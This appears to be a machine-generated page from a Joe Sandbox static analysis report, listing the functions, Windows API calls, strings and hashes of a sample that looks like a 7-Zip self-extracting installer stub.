GetDlgItem.USER32(?,00000002), ref: 00408C86
IsWindow.USER32(00000000), ref: 00408C89
GetDlgItem.USER32(?,00000002), ref: 00408C99
EnableWindow.USER32(00000000), ref: 00408C9C
GetDlgItem.USER32(?,000004B5), ref: 00408CB0
ShowWindow.USER32(00000000), ref: 00408CB3

Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49

Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
String ID:
API String ID: 1057135554-0
Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C

Function 004072F5 Relevance: 24.3, APIs: 16, Instructions: 294COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040731D
GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
GetDlgItem.USER32(?,000004B4), ref: 00407359
GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
GetSystemMetrics.USER32(00000010), ref: 004073E0
GetSystemMetrics.USER32(00000011), ref: 004073E6
GetSystemMetrics.USER32(00000008), ref: 004073ED
GetSystemMetrics.USER32(00000007), ref: 004073F4
GetParent.USER32(?), ref: 00407418
GetClientRect.USER32(00000000,?), ref: 0040742A
ClientToScreen.USER32(?,?), ref: 0040743D
SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
GetClientRect.USER32(?,?), ref: 0040753D

Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB

ClientToScreen.USER32(?,?), ref: 00407446

Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9

GetSystemMetrics.USER32(00000008), ref: 004075C2
GetSystemMetrics.USER32(00000007), ref: 004075C9

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
String ID:
API String ID: 747815384-0
Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65

Function 00403400 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 264COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7

Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7

??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4

Strings

SetEnvironment, xrefs: 00403613
0VA, xrefs: 0040363B, 00403641, 00403648, 00403651
{\rtf, xrefs: 00403584, 00403599

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@
String ID: 0VA$SetEnvironment${\rtf
API String ID: 613200358-2390373888
Opcode ID: b44e7f59370a601b0eb2b729e037dec59d8e39194785ba66c3c934530fbc5d67
Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
Opcode Fuzzy Hash: b44e7f59370a601b0eb2b729e037dec59d8e39194785ba66c3c934530fbc5d67
Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49

Function 0041382F Relevance: 16.6, APIs: 11, Instructions: 111COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0041385C
__p__fmode.MSVCRT ref: 00413871
__p__commode.MSVCRT ref: 0041387F
__setusermatherr.MSVCRT ref: 004138AB
_initterm.MSVCRT ref: 004138C1
__getmainargs.MSVCRT ref: 004138E4
_initterm.MSVCRT ref: 004138F4
GetStartupInfoA.KERNEL32(?), ref: 00413933
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00413957
exit.MSVCRT ref: 00413967
_XcptFilter.MSVCRT ref: 00413979

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58

Function 00407823 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00407831
GetWindowLongW.USER32(00000000), ref: 00407838
DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
GetSystemMetrics.USER32(00000031), ref: 0040787D
GetSystemMetrics.USER32(00000032), ref: 00407884
GetWindowDC.USER32(?), ref: 00407896
GetWindowRect.USER32(?,?), ref: 004078A3
DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
ReleaseDC.USER32(?,00000000), ref: 004078DF

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65

Function 00403BA2 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9

Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80

??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
wsprintfA.USER32 ref: 00403C31
wsprintfA.USER32 ref: 00403C5E

Strings

;!@Install@!UTF-8!, xrefs: 00403BAE
;!@InstallEnd@!, xrefs: 00403BBD
:%hs, xrefs: 00403C2B
:Language:%u, xrefs: 00403C58

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$wsprintf
String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 2704270482-695273242
Opcode ID: c48df58c78765c32bb50191d8ae9e25f1a9f38508890f025c69ef5feca28e328
Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
Opcode Fuzzy Hash: c48df58c78765c32bb50191d8ae9e25f1a9f38508890f025c69ef5feca28e328
Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99

Function 00407028 Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040703C
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
GetDlgItem.USER32(?,000004B4), ref: 00407059
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
GetDlgItem.USER32(?,?), ref: 0040707A
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
GetDlgItem.USER32(?,?), ref: 0040708B
SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ItemMessageSend$Focus
String ID:
API String ID: 3946207451-0
Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28

Function 00407649 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
GetWindow.USER32(?,00000005), ref: 0040767B
GetWindow.USER32(00000000,00000002), ref: 00407691

Strings

uxtheme, xrefs: 0040764A
hA, xrefs: 00407684
SetWindowTheme, xrefs: 0040765C

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: Window$AddressLibraryLoadProc
String ID: hA$SetWindowTheme$uxtheme
API String ID: 324724604-1539679821
Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC

Function 0040769E Relevance: 12.1, APIs: 8, Instructions: 69COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
GetDC.USER32(00000000), ref: 004076E7
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
ReleaseDC.USER32(00000000,?), ref: 00407710
GetModuleHandleW.KERNEL32(00000000), ref: 00407738
DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
String ID:
API String ID: 2693764856-0
Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69

Function 0040720C Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 0040721C
GetSystemMetrics.USER32(0000000B), ref: 00407238
GetSystemMetrics.USER32(0000003D), ref: 00407241
GetSystemMetrics.USER32(0000003E), ref: 00407249
SelectObject.GDI32(?,?), ref: 00407266
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
SelectObject.GDI32(?,?), ref: 004072A7
ReleaseDC.USER32(?,?), ref: 004072B6

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40

Function 00408196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
GetDlgItem.USER32(?,000004B8), ref: 004081EE
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
wsprintfW.USER32 ref: 0040821E
??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6

Strings

%d%%, xrefs: 00408218

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID: %d%%
API String ID: 3753976982-1518462796
Opcode ID: a216eac3ecc415c40cbab1f8d0e03bd7b2a4d2c6988f6979b0e2622e0ea1e2c6
Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
Opcode Fuzzy Hash: a216eac3ecc415c40cbab1f8d0e03bd7b2a4d2c6988f6979b0e2622e0ea1e2c6
Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68

Function 004083AD Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 004083C7
KillTimer.USER32(?,00000001), ref: 004083D8
SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
SuspendThread.KERNEL32(00000290), ref: 0040841B
ResumeThread.KERNEL32(00000290), ref: 00408438
EndDialog.USER32(?,00000000), ref: 0040845A

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: DialogThreadTimer$KillResumeSuspend
String ID:
API String ID: 4151135813-0
Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C

Function 00404032 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4

Strings

%%M/, xrefs: 00404096
%%M\, xrefs: 00404058

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@
String ID: %%M/$%%M\
API String ID: 613200358-4143866494
Opcode ID: 68271e494a0f74d8ecbf9e29a3c3c223af6f24d95afb8dee3d6b1d7d1fe2bc06
Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
Opcode Fuzzy Hash: 68271e494a0f74d8ecbf9e29a3c3c223af6f24d95afb8dee3d6b1d7d1fe2bc06
Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88

Function 00403EBC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E

Strings

%%T/, xrefs: 00403F20
%%T\, xrefs: 00403EE2

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@
String ID: %%T/$%%T\
API String ID: 613200358-2679640699
Opcode ID: d9a5077886a71a0ca53f1ec6eb52c341c976c403826948e12c551841c6c58d67
Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
Opcode Fuzzy Hash: d9a5077886a71a0ca53f1ec6eb52c341c976c403826948e12c551841c6c58d67
Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98

Function 00403F77 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029

Strings

%%S/, xrefs: 00403FDB
%%S\, xrefs: 00403F9D

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@
String ID: %%S/$%%S\
API String ID: 613200358-358529586
Opcode ID: ca2be7d20d2ff53e81e9f3a224629587fd966fa2135bca586d8c43d41441b967
Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
Opcode Fuzzy Hash: ca2be7d20d2ff53e81e9f3a224629587fd966fa2135bca586d8c43d41441b967
Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88

Function 0040D79C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834

Strings

